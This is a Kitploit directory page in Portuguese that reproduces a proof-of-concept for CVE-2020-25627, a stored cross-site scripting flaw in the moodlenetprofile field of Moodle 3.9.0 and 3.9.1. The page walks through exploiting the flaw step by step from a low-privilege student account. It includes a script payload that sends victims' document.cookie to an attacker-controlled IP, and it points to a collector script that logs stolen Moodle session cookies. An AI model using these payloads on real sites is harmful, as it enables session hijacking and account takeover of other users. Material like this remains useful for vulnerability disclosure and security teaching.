Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2020-25627 — XSS armazenado através do parâmetro moodlenetprofile no perfil do usuário | Kitploit
Ferramentas/GitHubGitHub/hoangkien1020/cve-2020-25627
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubhoangkien1020/cve-2020-25627

CVE-2020-25627

XSS armazenado através do parâmetro moodlenetprofile no perfil do usuário

Ver Repositório
3há 5 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2020-25627

XSS Armazenado via parâmetro moodlenetprofile no perfil do usuário

Meu PoC sobre este CVE

Requisito do usuário: Estudante (Ou o site para registro)

XSS em moodlenetprofile

root@kitploit:~
Step 1: Log in with an authenticated user (Can register or through creating a new user without assigning roles )

Step 2: Quick access to Edit profile

domain/moodle/user/edit.php?id=<your user_id>&returnto=profile

In MoodleNet profile, add the script as:

<script>alert("HK")</script>

And save:

Step 3: Anytime, the other user goes to view your profile, the stored XSS will trigger.

Steal cookie via script:

<script>var i=new Image;i.src="http://192.168.0.238/xss.php?"+document.cookie;</script>

Change your domain and upload xss.php to your host:

https://github.com/HoangKien1020/pentest/tree/master/XSS

Done. You can view log.txt to get Moodle session.

parâmetro moodlenetprofile

Versão afetada: 3.9.0 , 3.9.1

Fonte

https://moodle.org/mod/forum/discuss.php?d=410839

Impacto do XSS (roubo de cookies,...), veja aqui:

https://github.com/HoangKien1020/pentest/tree/master/XSS

Baixar ferramenta